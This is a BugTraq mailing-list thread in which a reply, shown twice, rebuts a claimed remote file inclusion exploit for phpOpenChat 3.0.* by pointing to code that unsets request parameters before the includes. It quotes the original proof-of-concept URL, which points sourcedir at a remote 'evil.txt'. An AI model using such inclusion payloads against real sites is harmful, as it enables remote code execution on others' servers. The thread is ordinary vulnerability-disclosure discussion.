BugTraq
Back to list
|
Post reply
WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
Sep 06 2006 07:17PM
stormhacker hotmail com
(1 replies)
Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
Sep 07 2006 10:18PM
Carsten Eilers (ceilers-lists gmx de)
(1 replies)
Hi,
stormhacker (at) hotmail (dot) com [email concealed] schrieb am Wed, 6 Sep 2006 19:17:11 +0000:
>-----------------Description---------------
>
>
>include_once("QueryString.php");
>
>include_once("Settings.php");
>
>include_once("$sourcedir/Subs.php");
>
>include_once("$sourcedir/Errors.php");
>
>include_once("$sourcedir/Load.php");
>
>//include_once("$sourcedir/Security.php");
Nice.
But you forgot the three little line above of this:
| $givenParams = array_keys($_REQUEST);
| foreach($givenParams as $param )
| unset(${$param});
And this...
>--------------PoC/Exploit----------------------
>
>
>http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http:/
/
>host/evil.txt?
... unsets your set sourcedir.
Result: There is no vulnerability.
Maybee $sourcedir is set/manipulated in QueryString.php
or Settings.php, but these script see nothing about your
manipulated sourcedir since it's unset before the includes.
>--------------Solution---------------------
>
>
>No Patch available.
No patch necessary.
Regards
Carsten
--
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz
<http://www.ceilers-it.de>
[ reply ]
AW: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
Sep 08 2006 01:14AM
Frank Reißner (mail frank-reissner de)
(1 replies)
Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
Sep 08 2006 06:57AM
Carsten Eilers (ceilers-lists gmx de)
Privacy Statement
Copyright 2010, SecurityFocus
stormhacker (at) hotmail (dot) com [email concealed] schrieb am Wed, 6 Sep 2006 19:17:11 +0000:
>-----------------Description---------------
>
>
>include_once("QueryString.php");
>
>include_once("Settings.php");
>
>include_once("$sourcedir/Subs.php");
>
>include_once("$sourcedir/Errors.php");
>
>include_once("$sourcedir/Load.php");
>
>//include_once("$sourcedir/Security.php");
Nice.
But you forgot the three little line above of this:
| $givenParams = array_keys($_REQUEST);
| foreach($givenParams as $param )
| unset(${$param});
And this...
>--------------PoC/Exploit----------------------
>
>
>http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http:/
/
>host/evil.txt?
... unsets your set sourcedir.
Result: There is no vulnerability.
Maybee $sourcedir is set/manipulated in QueryString.php
or Settings.php, but these script see nothing about your
manipulated sourcedir since it's unset before the includes.
>--------------Solution---------------------
>
>
>No Patch available.
No patch necessary.
Regards
Carsten
--
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz
<http://www.ceilers-it.de>
[ reply ]